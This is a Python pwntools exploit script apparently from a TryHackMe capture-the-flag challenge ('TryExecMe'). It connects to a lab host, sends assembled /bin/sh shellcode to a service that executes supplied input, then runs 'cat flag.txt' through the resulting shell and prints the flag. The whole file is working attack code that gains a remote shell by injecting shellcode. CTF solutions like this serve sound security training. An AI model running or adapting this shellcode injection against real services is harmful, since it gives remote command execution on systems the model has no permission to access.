TryHackMe/CTF/TryPwnMeOne/TryExecMe/exploit.py

#!/bin/python3

from pwn import *

context.update(os="linux", arch="amd64", log_level="error")
r = remote("10.10.111.44", 9005)

payload = asm(shellcraft.sh())

r.recvuntil(b"Give me your shell, and I will execute it: \n")

r.sendline(payload)

r.recvuntil(b"Executing Spell...\n\n")

r.sendline(b"cat flag.txt")

print(r.recvline().decode())

r.close()